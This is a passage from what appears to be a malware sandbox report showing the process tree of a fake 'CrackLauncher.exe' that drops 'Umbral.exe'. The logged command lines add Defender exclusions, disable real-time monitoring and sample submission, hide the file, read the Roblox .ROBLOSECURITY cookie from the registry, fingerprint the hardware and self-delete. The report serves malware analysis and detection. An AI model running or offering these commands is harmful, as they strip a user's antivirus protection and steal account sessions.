        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        9⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5088
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        10⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:5108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:396
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        11⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1848
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        12⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        13⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3664
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        14⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        15⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:4396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        16⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:1832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        17⤵
        Checks computer location settings
        Adds Run key to start application
        
        PID:3108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        18⤵
        
        PID:712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1848
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        19⤵
        
        PID:4488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        20⤵
        
        PID:1364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        21⤵
        
        PID:1820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        22⤵
        
        PID:1712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        23⤵
        
        PID:3836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3284
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        24⤵
        
        PID:3220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:736
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        25⤵
        
        PID:2564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        26⤵
        
        PID:3256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3528
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        
        PID:4492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        
        PID:4228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        
        PID:4172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:3632
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        Views/modifies file attributes
        
        PID:4072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        25⤵
        
        PID:3332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        25⤵
        
        PID:1456
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        25⤵
        
        PID:3144
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        25⤵
        
        PID:2152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        25⤵
        
        PID:1892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        25⤵
        Detects videocard installed
        
        PID:1564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        
        PID:3784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        
        PID:4796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        
        PID:1832
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:3876
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        Views/modifies file attributes
        
        PID:1036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        22⤵
        
        PID:1984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:1800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        22⤵
        
        PID:3024
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        23⤵
        
        PID:4608
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        22⤵
        
        PID:2304
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        22⤵
        
        PID:1796
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        22⤵
        
        PID:3876
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        23⤵
        
        PID:4172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        22⤵
        
        PID:1852
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        22⤵
        Detects videocard installed
        
        PID:1876
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4292
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        
        PID:2944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        
        PID:2432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2172
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Executes dropped EXE
        
        PID:1008
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:3640
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Views/modifies file attributes
        
        PID:4704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:1672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        20⤵
        
        PID:1004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:3044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        
        PID:3680
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        19⤵
        
        PID:940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        19⤵
        
        PID:4172
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        19⤵
        
        PID:1848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        19⤵
        Detects videocard installed
        
        PID:4816
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1508
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        17⤵
        Executes dropped EXE
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        Executes dropped EXE
        
        PID:3724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4768
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        16⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Executes dropped EXE
        
        PID:436
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:1504
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        Views/modifies file attributes
        
        PID:904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        
        PID:4356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        16⤵
        
        PID:2604
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        16⤵
        
        PID:4388
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:3960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        16⤵
        
        PID:3220
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        16⤵
        
        PID:4700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        16⤵
        
        PID:1004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        16⤵
        Detects videocard installed
        
        PID:3556
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:224
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        14⤵
        Executes dropped EXE
        
        PID:1428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1804
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Executes dropped EXE
        
        PID:4956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Executes dropped EXE
        
        PID:3500
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        13⤵
        
        PID:1008
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Views/modifies file attributes
        
        PID:2908
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        14⤵
        
        PID:5088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        13⤵
        
        PID:3536
        
        C:\Windows\System32\Conhost.exe
        
